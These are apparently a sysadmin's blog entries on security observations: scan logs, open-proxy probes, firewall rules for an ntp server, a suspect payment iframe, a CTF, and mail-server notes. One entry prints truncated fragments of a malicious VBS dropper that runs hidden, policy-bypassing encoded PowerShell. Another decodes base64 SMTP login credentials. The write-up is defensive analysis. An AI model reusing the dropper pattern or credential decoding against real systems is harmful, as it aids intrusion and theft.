News items for tag security - Koos van den Hout

Apr  6 23:41:16 greenblatt sshd[25116]: Invalid user squid from 139.99.122.129
Apr  7 01:44:09 greenblatt sshd[3495]: Invalid user squid from 110.10.189.108
Apr  7 08:21:37 greenblatt sshd[7106]: Invalid user squid from 118.24.100.11

I'm glad you read my newsitem about keeping squid running.

It seems any open port can be tried as an open webproxy. An open webproxy is interesting for hiding tracks or getting around restrictions. But some of the scans are getting stupid. There are still a lot of other tcp-based services, not everything is HTTP.

From recent logs:

Mar 14 13:46:42 greenblatt nnrpd[20297]: 185.100.87.248 unrecognized GET / HTTP/1.0                                                                             
Mar 14 13:46:47 greenblatt nnrpd[20299]: 185.100.87.248 unrecognized OPTIONS / HTTP/1.0                                                                         
Mar 14 13:46:52 greenblatt nnrpd[20301]: 185.100.87.248 unrecognized OPTIONS / RTSP/1.0                                                                         

And this gem of distributed scanning:

Mar  8 08:45:00 greenblatt sm-mta[6355]: w287j0dE006355: 78.84.202.1.static.bjtelecom.net: probable open proxy: command=GET http://www.boxun.com/ HTTP/1.1\r\n
Mar  8 08:45:00 greenblatt sm-mta[6359]: w287j0V0006359: [14.204.118.100]: probable open proxy: command=GET http://www.minghui.org/ HTTP/1.1\r\n
Mar  8 08:45:00 greenblatt sm-mta[6360]: w287j0lM006360: [14.204.94.84]: probable open proxy: command=GET http://www.rfa.org/ HTTP/1.1\r\n
Mar  8 08:45:04 greenblatt sm-mta[6353]: w287j4lq006353: [110.177.75.38]: probable open proxy: command=GET http://www.baidu.com/ HTTP/1.1\r\n
Mar  8 08:45:04 greenblatt sm-mta[6356]: w287j4io006356: [101.249.104.160]: probable open proxy: command=GET http://www.bing.com/ HTTP/1.1\r\n
Mar  8 08:45:04 greenblatt sm-mta[6357]: w287j4h0006357: [119.118.16.42]: probable open proxy: command=GET http://wujieliulan.com/ HTTP/1.1\r\n
Mar  8 08:45:05 greenblatt sm-mta[6358]: w287j5pu006358: [112.66.106.4]: probable open proxy: command=CONNECT www.voanews.com:443 HTTP/1.0\r\n
Mar  8 08:45:05 greenblatt sm-mta[6354]: w287j5bt006354: 36.49.239.221.broad.tj.tj.dynamic.163data.com.cn [221.239.49.36] (may be forged): probable open proxy: command=GET http://www.123cha.com/ HTTP/1.1\r\n

Interesting timing and coordination on this one, looks like some form of central control was involved.

In some files I noticed a vbs file where I expected something else. Vbs sounds like visual basic script so I directly started looking for malware. And indeed I saw suspicous code, with a for me new type of obfuscation.

The vbs has one really long line, beginning with:

CreateObject("Wscript.Shell").Run("powershell -w hidden -ep bypass -enc aQBuAHYA
bwBrAGUALQBlAHgAcAByAGUAcwBzAGkAbwBuACgAIgB7ADQAOAB9AHsAMQAyAH0AewAyADgAfQB7ADEA
MAAzAH0AewAyADEAfQB7ADkAfQB7ADEAMAA2AH0AewA3ADAAfQB7ADIAOAB9AHsAOAB9AHsAMAB9AHsA

and at the end:

IgByACIALAAiAGsAIgAsACIAYQAiACwAIgAgACIALAAiAHYAIgAsACIAZwAiACwAIgBzACIALAAiAGUA
IgAsACIAbgAiACwAIgArACIALAAiAHQAIgAsACIAcgAiACwAIgAiACwAIgB0ACIALAAiAHAAIgAsACIA
ZQAiACwAIgBlACIALAAiAC8AIgAsACIAZQAiACwAIgBTACIAKQA=")

Which looked very base64-like to me. But standard tools could not find out what it was:

$ base64 -d < base64part | file -
/dev/stdin: data

But with a second look I could make out something:

$ base64 -d < base64part | xxd | less
0000000: 6900 6e00 7600 6f00 6b00 6500 2d00 6500  i.n.v.o.k.e.-.e.
0000010: 7800 7000 7200 6500 7300 7300 6900 6f00  x.p.r.e.s.s.i.o.
0000020: 6e00 2800 2200 7b00 3400 3800 7d00 7b00  n.(.".{.4.8.}.{.
0000030: 3100 3200 7d00 7b00 3200 3800 7d00 7b00  1.2.}.{.2.8.}.{.
0000040: 3100 3000 3300 7d00 7b00 3200 3100 7d00  1.0.3.}.{.2.1.}.
0000050: 7b00 3900 7d00 7b00 3100 3000 3600 7d00  {.9.}.{.1.0.6.}.
0000060: 7b00 3700 3000 7d00 7b00 3200 3800 7d00  {.7.0.}.{.2.8.}.
0000070: 7b00 3800 7d00 7b00 3000 7d00 7b00 3200  {.8.}.{.0.}.{.2.
0000080: 7d00 7b00 3400 3100 7d00 7b00 3100 3100  }.{.4.1.}.{.1.1.
0000090: 3300 7d00 7b00 3600 3600 7d00 7b00 3000  3.}.{.6.6.}.{.0.

Suddenly there is UTF-16 powershell code. Or when I simply cat it to a terminal:

invoke-expression("{48}{12}{28}{103}{21}{9}{106}{70}{28}{8}{0}{2}{41}{113}{66}
[..]
-f "t","2"," ",".","i","f","C","'","c","o","2",")","n","n","0","c","'","/",

It looks like some kind of array mapping, but I have no idea how to decode this into readable code to check what it does. I am quite sure it can't be up to any good if I keep finding levels of obfuscation!

In the sshd logging today:

sshd[26961]: Invalid user <!-- from 103.9.88.249

But the logging is parsed via software that doesn't trust input either, so the rest is in the report too. Including more attempts from that IPv4 address.

I was setting up a linux based firewall on a busy ntp server and to make sure everything worked as designed I added the usual:

iptables -A INPUT -j ACCEPT --protocol all -m state --state ESTABLISHED,RELATED

And after less than half an hour the system log started filling with

nf_conntrack: table full, dropping packet
nf_conntrack: table full, dropping packet
nf_conntrack: table full, dropping packet
nf_conntrack: table full, dropping packet

It is indeed a busy server. The solution is to exclude all the ntp traffic from the stateful firewall. Which means I have to allow all kinds of ntp traffic (outgoing and incoming) by itself.

The specific ruleset:

iptables -t raw -A PREROUTING --protocol udp --dport 123 -j NOTRACK
iptables -t raw -A OUTPUT --protocol udp --sport 123 -j NOTRACK

iptables -A INPUT -j ACCEPT --protocol udp --destination-port 123

I also made sure the rules for the ntp traffic are the first rules.

Traffic at this server is somewhat over 1000 ntp request per second. So the counters of the NOTRACK rules go fast.

# iptables -t raw -L -v
Chain PREROUTING (policy ACCEPT 1652K packets, 126M bytes)
 pkts bytes target     prot opt in     out     source               destination 
9635K  732M CT         udp  --  any    any     anywhere             anywhere             udp dpt:ntp NOTRACK
1650K  125M CT         udp  --  any    any     anywhere             anywhere             udp dpt:ntp NOTRACK

Chain OUTPUT (policy ACCEPT 1522K packets, 117M bytes)
 pkts bytes target     prot opt in     out     source               destination 
9029K  686M CT         udp  --  any    any     anywhere             anywhere             udp spt:ntp NOTRACK
1520K  116M CT         udp  --  any    any     anywhere             anywhere             udp spt:ntp NOTRACK

But no packets are dropped, which is good as this server is supposed to be under a constant DDoS.

I noticed today one of the ntp servers I manage has been collecting ages of ntpd mode 7 probes without ever responding. But it makes a nice overview of probing IPv4 addresses:

remote address          port local address      count m ver rstr avgint  lstint
===============================================================================
184.105.139.82          1714 xxx.xxx.xxx.xxx        3 7 2      1 3413098   40058
184.105.139.72         14152 xxx.xxx.xxx.xxx        7 6 2      1 1107023   60553
185.165.29.145         33482 xxx.xxx.xxx.xxx        9 7 2      1 647886   73704
91.200.12.126          47493 xxx.xxx.xxx.xxx        2 7 2      1  12199   78678
185.94.111.1           33066 xxx.xxx.xxx.xxx       44 7 2      1 139771   83493
212.237.45.33          39353 xxx.xxx.xxx.xxx        1 7 2      1      0   84058
184.105.139.122        16124 xxx.xxx.xxx.xxx        4 7 2      1 1830407  127241
165.227.44.214         36749 xxx.xxx.xxx.xxx        1 7 2      1      0  138342
185.82.203.150         38141 xxx.xxx.xxx.xxx       12 7 2      1 147806  143793
185.2.81.90            33119 xxx.xxx.xxx.xxx        6 7 2      1 199742  180842
184.105.139.110        57630 xxx.xxx.xxx.xxx        6 7 2      1 968029  223794
77.87.79.97            34540 xxx.xxx.xxx.xxx        2 7 2      1  31910  251316
184.105.139.102        50130 xxx.xxx.xxx.xxx        3 7 2      1 2950157  308291
185.55.218.227         33716 xxx.xxx.xxx.xxx        2 7 2      1 853413  311971
104.243.41.54          30820 xxx.xxx.xxx.xxx        2 7 2      1 3258925  334017
123.249.27.176         35963 xxx.xxx.xxx.xxx        7 7 2      1 452131  339518
191.96.249.173         42895 xxx.xxx.xxx.xxx       10 7 2      1 692139  348753
71.194.80.50           51096 xxx.xxx.xxx.xxx        2 7 2      1  74579  392665
184.105.139.126        38393 xxx.xxx.xxx.xxx        2 7 2      1 3535530  394349
185.55.218.250         48871 xxx.xxx.xxx.xxx        2 7 2      1 537671  411921
184.105.139.86         34651 xxx.xxx.xxx.xxx        5 7 2      1 1361673  478157
123.249.24.175         37973 xxx.xxx.xxx.xxx        6 7 2      1 476469  502270
184.105.139.98         21269 xxx.xxx.xxx.xxx       10 7 2      1 718112  567076
184.105.139.70         38190 xxx.xxx.xxx.xxx        6 7 2      1 1107237  649625
66.55.135.62           54536 xxx.xxx.xxx.xxx        8 7 2      1  40836  721372
138.197.130.148        39857 xxx.xxx.xxx.xxx        2 7 2      1 415601  788308
191.96.249.113         36079 xxx.xxx.xxx.xxx        2 7 2      1 1501700  862267
184.105.139.78         37702 xxx.xxx.xxx.xxx        4 7 2      1 1637431  908028
159.89.47.224          47766 xxx.xxx.xxx.xxx        5 7 2      1 361160  913255
162.209.168.12         39122 xxx.xxx.xxx.xxx        2 7 2      1 109901  976174
123.249.26.159         34990 xxx.xxx.xxx.xxx       41 7 2      1  88999 1045070
184.105.139.74         38666 xxx.xxx.xxx.xxx        6 7 2      1 822261 1079624
185.55.218.242         54815 xxx.xxx.xxx.xxx        7 7 2      1  89032 1102095
191.96.249.12          48406 xxx.xxx.xxx.xxx        4 7 2      1 1133779 1198815
101.100.146.139        39660 xxx.xxx.xxx.xxx        3 7 2      1 1951322 1244586
209.250.238.186        39459 xxx.xxx.xxx.xxx        2 7 2      1  53072 1252190
119.1.109.85           51099 xxx.xxx.xxx.xxx       10 7 2      1 223881 1325320
184.105.139.118        34319 xxx.xxx.xxx.xxx        4 7 2      1 905995 1339133
184.105.139.106        15081 xxx.xxx.xxx.xxx        2 7 2      1 2932231 1430316
191.96.249.131         35972 xxx.xxx.xxx.xxx        2 7 2      1 1499287 1491171
185.55.218.237         43409 xxx.xxx.xxx.xxx        2 7 2      1 4255207 1497992
185.55.218.236         55927 xxx.xxx.xxx.xxx        3 7 2      1 1566148 1718947
138.68.247.41          41914 xxx.xxx.xxx.xxx        2 7 2      1  53524 1936953
184.105.139.94         41523 xxx.xxx.xxx.xxx        5 7 2      1 1112720 1948506
45.63.27.150           40862 xxx.xxx.xxx.xxx        2 7 2      1 1676933 1991259
185.188.207.13         45915 xxx.xxx.xxx.xxx       20 7 2      1 156321 2041538
185.44.107.183         45785 xxx.xxx.xxx.xxx        2 7 2      1 132706 2107890
184.105.139.90         35315 xxx.xxx.xxx.xxx        5 7 2      1 350936 2206670
191.96.249.61          30296 xxx.xxx.xxx.xxx        3 7 2      1  59063 2226284
195.22.127.173         40060 xxx.xxx.xxx.xxx        2 7 2      1  20615 2253429
184.105.139.114        56609 xxx.xxx.xxx.xxx        4 7 2      1 604491 2291452
104.243.41.52            123 xxx.xxx.xxx.xxx        2 7 2      1  85831 2381504
103.9.78.129           50367 xxx.xxx.xxx.xxx        2 7 2      1 868629 2449128
167.88.15.18           40815 xxx.xxx.xxx.xxx        2 7 2      1 182471 2525650
167.88.180.82          40640 xxx.xxx.xxx.xxx        2 7 2      1  66892 2715823
192.158.229.240        39284 xxx.xxx.xxx.xxx        4 7 2      1 163873 2759391
51.15.45.102           45371 xxx.xxx.xxx.xxx        2 7 2      1  92720 2768083
185.198.58.55          18637 xxx.xxx.xxx.xxx        2 7 0      1 802096 2787683
123.249.24.197         40362 xxx.xxx.xxx.xxx       37 7 2      1  85431 2983252
167.88.180.26          49125 xxx.xxx.xxx.xxx        4 7 2      1  60114 3023906
188.213.49.83          34969 xxx.xxx.xxx.xxx        2 7 2      1 254056 3095396
45.76.24.165           41025 xxx.xxx.xxx.xxx        2 7 2      1 107397 3103557
213.183.54.46          40409 xxx.xxx.xxx.xxx        5 7 2      1 206100 3224158
145.239.237.23         35814 xxx.xxx.xxx.xxx        2 7 2      1 571497 3264230
165.227.220.24         39557 xxx.xxx.xxx.xxx        2 7 2      1  52796 3292818
123.249.35.214         47756 xxx.xxx.xxx.xxx        2 7 2      1 242695 3296347
123.249.76.52          59698 xxx.xxx.xxx.xxx        8 7 2      1 246226 3446607
123.249.79.178         52301 xxx.xxx.xxx.xxx        2 7 2      1 839605 3455884
207.254.182.131        52337 xxx.xxx.xxx.xxx        4 7 2      1   1384 3648002
185.55.218.109         37602 xxx.xxx.xxx.xxx        2 7 2      1 752428 3652434
128.14.61.111          53586 xxx.xxx.xxx.xxx        3 7 2      1 103699 3796467
104.238.146.66         52224 xxx.xxx.xxx.xxx        2 7 2      1 138668 3837468
95.215.62.72           42111 xxx.xxx.xxx.xxx        4 7 2      1 608618 3932262
45.76.195.157          59987 xxx.xxx.xxx.xxx        2 7 2      1 143642 4096101
123.249.79.232         40165 xxx.xxx.xxx.xxx        4 7 2      1 146715 4317577
86.105.9.86            55857 xxx.xxx.xxx.xxx        4 7 2      1 115972 4329305
217.147.89.197         49717 xxx.xxx.xxx.xxx        4 7 2      1 314874 4463013
182.18.22.246          58611 xxx.xxx.xxx.xxx        3 7 2      1 359548 4485937
185.82.203.107         56661 xxx.xxx.xxx.xxx        7 7 2      1 176060 4516810
79.124.60.148          58043 xxx.xxx.xxx.xxx        2 7 2      1 687406 4684505
185.107.94.66          46254 xxx.xxx.xxx.xxx        2 7 2      1 1263073 4750583
191.96.249.84          49259 xxx.xxx.xxx.xxx        2 7 2      1 329846 5160890
111.121.193.201         6065 xxx.xxx.xxx.xxx        3 7 0      1 101832 5558503
185.188.207.15         33999 xxx.xxx.xxx.xxx        3 7 2      1  90416 5655119
185.117.74.118         52973 xxx.xxx.xxx.xxx        2 7 2      1   2174 5717159
185.82.203.58          59170 xxx.xxx.xxx.xxx        2 7 2      1  47838 5847404
185.162.128.66         39141 xxx.xxx.xxx.xxx        2 7 2      1   4837 5895126

All IP addresses with only 1 packet removed.

Ik wilde vandaag iets betalen in een website en die kwam vervolgens met "Mastercard securecode". Alleen de manier waarop was dusdanig dat ik de betaling afgebroken heb omdat ik het niet vertrouwde.

De afhandeling van Mastercard securecode was binnen een iframe van de website, in een compleet andere stijl dan de website. Vervolgens bleek bij het opvragen van details dat dat iframe komt van https://www.securesuite.co.uk/ing_retail/ wat geen EV certificaat heeft. Na het vragen om de creditcard gegevens kwam een vraag over de rekening die gekoppeld is aan de creditcard en een geboortedatum. Of dat gaat om mijn geboortedatum of die van de persoon van wie de creditcard is stond er niet bij.

Dus een ernstige phishing poging of een slechte implementatie van het voorkomen van fraude. Ooit heb ik de mastercard secure code ingesteld, en daar werd ook niet naar gevraagd. Ik heb er voor gekozen de betaling af te breken.

In 2010 schreef al iemand hierover: Verified by Visa and Mastercard SecureCode are broken and need to be fixed. Sindsdien is de enige verandering dat ik nu een EV certificaat op zo'n site zou verwachten. En dat heeft www.securesuite.co.uk niet.

In building the new homeserver there is also time to test things and improve robustness a bit (although I should not overdo it).

The one thing that forces me to look at some web-code again is that the new servers run PHP version 7. Some of my code is giving warnings, time to fix that. But I haven't written any serious PHP in ages, I just rewrote sites in mod_perl. So my PHP is rusty and needs work, especially with PHP 7.

It's a good thing I use version management, which allows me to test the fixes on the development version(s) of the site and push them to the production version when I'm happy with the results.

Some of the things I notice that could improve go on the todo list. One thing I did notice and fixed right away was that the CVS metadata inside the web directories could be requested too. Although I find no serious security information in there it is still an unwanted information leak.

This morning I noticed some to me new amounts of sshd noise in the log:

Dec 26 01:55:43 server sshd[31415]: Bad protocol version identification '\200F\001\003\001' from 185.110.132.140
Dec 26 01:56:24 server sshd[31466]: Bad protocol version identification '\200F\001\003\001' from 185.110.132.140
Dec 26 01:56:53 server sshd[31475]: Bad protocol version identification '\200F\001\003\001' from 185.110.132.140
Dec 26 01:57:33 server sshd[31499]: Bad protocol version identification '\200F\001\003\001' from 185.110.132.140
Dec 26 01:58:17 server sshd[31691]: Bad protocol version identification '\200F\001\003\001' from 185.110.132.140
Dec 26 01:58:51 server sshd[31749]: Bad protocol version identification '\200F\001\003\001' from 185.110.132.140
Dec 26 01:59:32 server sshd[31773]: Bad protocol version identification '\200F\001\003\001' from 185.110.132.140

Dec 26 12:07:58 server sshd[16434]: Bad protocol version identification '\200F\001\003\001' from 185.110.132.140
Dec 26 12:08:55 server sshd[16687]: Bad protocol version identification '\200F\001\003\001' from 185.110.132.140
Dec 26 12:09:52 server sshd[16743]: Bad protocol version identification '\200F\001\003\001' from 185.110.132.140

Going on and on and on and..

So I looked it up and found How to block Bad protocol version? · Issue #1284 · fail2ban/fail2ban · GitHub which has a simple rule to block this with fail2ban. As soon as the sshd.local was loaded a block was set for 185.110.132.140.

Vijf jaar geleden deed ik mee aan de hackcontest ter ere van 20 jaar SURFcert. Vijf jaar verder ben ik zelf lid van het SURFcert team en heb ik mee georganiseerd aan de hackcontest / capture the flag op 8 december. Dit keer was het een 'capture the flag' stijl wedstrijd waarbij teams van maximaal 4 personen streden om de eer. Bij een 'capture the flag' moet je uit diverse puzzels herkenbare 'flags' (vlaggen) vinden, zeer herkenbare speciale strings in bestanden. Ik had me vooral beziggehouden met flags in bestanden in allerlei vormen zoals commentaar in een plaatje (als morse) of een flag in een bestand in een textfile in een zip file achter een jpg file geplakt.

Vrijdag hebben er 4 teams gespeeld. Ze hebben de hele dag nodig gehad en een groot deel van de uitdagingen opgelost. Er was ook een team van de UU bij, die zijn zeer eervol derde geworden.

Dit keer zat ik dus aan de andere kant en zat mijn creativiteit niet in het oplossen van de challenges maar in het maken er van. Wat ik gemaakt had werd gewaardeerd en sommigen lieten zich op het verkeerde been zetten waar anderen juist dwars door mijn misleiding heen keken. Het ernstigste geval 'verstoppen in het volle zicht' (hiding in plain sight) was een flag die in een titel van de standaard webpagina zat. Niet iedereen had die gezien.

I am noticing lots and lots of distributed SSH scanning, not doing enough attempts from one IP address to trigger fail2ban. Timing and choice of login names used suggest a strong link between the ssh attempts even when source IPs are very different. Login names also refer to websites hosted on the same address.

At a given moment I started wondering if this was just me, but others reported the same and exchanging IP address lists showed a lot of matches between attacks on totally unrelated systems.

I read the Dutch version of "The Cuckoo's Egg" when it came out in 1989. Later I bought the English version.

Via a complete diversion I found out this weekend the book was made into a TV documentary: The KGB, the Computer and Me which has a lot less personal diversions than the book. It is played by Clifford Stoll himself and others involved in the original story. Although the CIA guys look a bit more stereotypical than they come out in the book.

A very interesting part is there is a closing remark in the documentary by Markus Hess. Now I want to get a view of the movie of the other side, '23'.

The funny part is that I found this documentary from following news related to amateur radio: Cliff Stoll -- K7TA -- Has THE KNACK. And a GREAT NOVA Video. Clifford Stoll does have a callsign: K7TA

I needed to look up some gpg commands and found GPG Cheat Sheet and it had what I was looking for.

Looking at this page I found this gem:

Ok, so what if you're a paranoid bastard and want to encrypt some of your own files, so nobody can break into your computer and get them? Simply encrypt them using yourself as the recipient.

That makes me a paranoid bastard since I use this to store passwords and other secrets.

Someone has been looking at websites I run to think of ssh login names to try:

Oct 16 16:21:53 greenblatt sshd[19367]: Invalid user weather from 223.194.227.104
Oct 16 16:22:11 greenblatt sshd[19387]: Invalid user weatherstation from 223.194.227.104
Oct 16 16:55:07 greenblatt sshd[22596]: Invalid user weerstation from 223.194.227.104

All valid and published websites on this system: http://weather.idefix.net/, http://weatherstation.idefix.net/, http://weerstation.idefix.net/.

The imap server where I fetch my work mail changed and suddenly the enigmail plugin on one system could not decrypt gpg-encrypted messages anymore with a 'partial decrypt' error. I remember seeing this before but had to look up the details.

Found again, it's a setting in enigmail (not in the general thunderbird preferences!), Enigmail → Preferences → select Advanced → Only download attachments when opened (IMAP only) has to be unchecked.

Answer found via Resolving Thunderbird/Enigmail decryption errors for encrypted emails with large attachments

I received a notification from the google webmaster program that chrome browser would start showing security warnings on http://www.virtualbookcase.com/ due to the search box there.

The simple solution: make the site correctly available via https and redirect to the https version. I found out I already started doing the first bit and therefore the conversion was easy. Now with encrypted connections: The Virtual Bookcase.

I saw someone post somewhere about problems with sending mail, with the complete session log. E-mail addresses were obfuscated, but there was a part of the session not obfuscated, which had far more interesting secrets than just e-mail addresses. It looked a bit like this:

250-HELP
250-AUTH LOGIN PLAIN
250-SIZE 157286400
250-8BITMIME
250 OK
AUTH LOGIN
334 VXNlcm5hbWU6
dXNlcm5hbWU=
334 UGFzc3dvcmQ6
cGFzc3dvcmQ=
235 ... authentication succeeded
RSET
250 OK

Those "random" letters and digits look a lot like base64, so to decode them:

$ echo "VXNlcm5hbWU6" | base64 -d ; echo
Username:
$ echo "dXNlcm5hbWU=" | base64 -d ; echo
username
$ echo "UGFzc3dvcmQ6" | base64 -d ; echo
Password:
$ echo "cGFzc3dvcmQ=" | base64 -d ; echo
password

So the random letters and digits are actually username and password, very interesting information. Searching for VXNlcm5hbWU6 gives me examples of usernames and passwords.

E-mail with subject starting with "Please find attached our purchase order number" and a zip, with a zip in it with in that zip an .exe file.

Archive:  PO185 - 188207 X.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
   341805  2017-07-19 04:55   PO362 - 867977 X.zip
---------                     -------
   341805                     1 file

Archive:  PO362 - 867977 X.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
   431458  2017-07-19 15:32   PO362 - 867977 X.exe
---------                     -------
   431458                     1 file

I guess the .exe will cause some serious damage in Windows operating systems. The size is huge, where is the time virus writes tried to stay below 1024 bytes!

Jul 16 04:17:01 greenblatt sshd[9365]: reverse mapping checking getaddrinfo for 121-124-124-73.youiwe.co.kr [121.124.124.73] failed - POSSIBLE BREAK-IN ATTEMPT!
Jul 16 04:17:01 greenblatt sshd[9365]: Invalid user 1234 from 121.124.124.73
Jul 16 04:17:01 greenblatt sshd[9365]: input_userauth_request: invalid user 1234 [preauth]
Jul 16 04:17:01 greenblatt sshd[9365]: Received disconnect from 121.124.124.73: 3: com.jcraft.jsch.JSchException: Auth fail [preauth]

That last bit is not from my sshd but an error message related to a java library for ssh, as noted in Reasons for com.jcraft.jsch.JSchException: Auth fail | Maximilian Böhm which correctly notes that attacks are a reason.

Haven't seen this before:

Jul 13 09:29:45 greenblatt sshd[24232]: Invalid user  from 193.105.134.187
Jul 13 09:29:45 greenblatt sshd[24232]: input_userauth_request: invalid user  [preauth]
Jul 13 09:29:59 greenblatt sshd[24232]: Disconnecting: Change of username or service not allowed: (,ssh-connection) -> (admin,ssh-connection) [preauth]

I have seen user '' (empty) before, but a change of username is new to me. Searching finds very little information, only one mention: Which ssh exploit works by changing the user name in the middle of the process? - Information Security stack exchange where the assumption was that this was some kind of attack.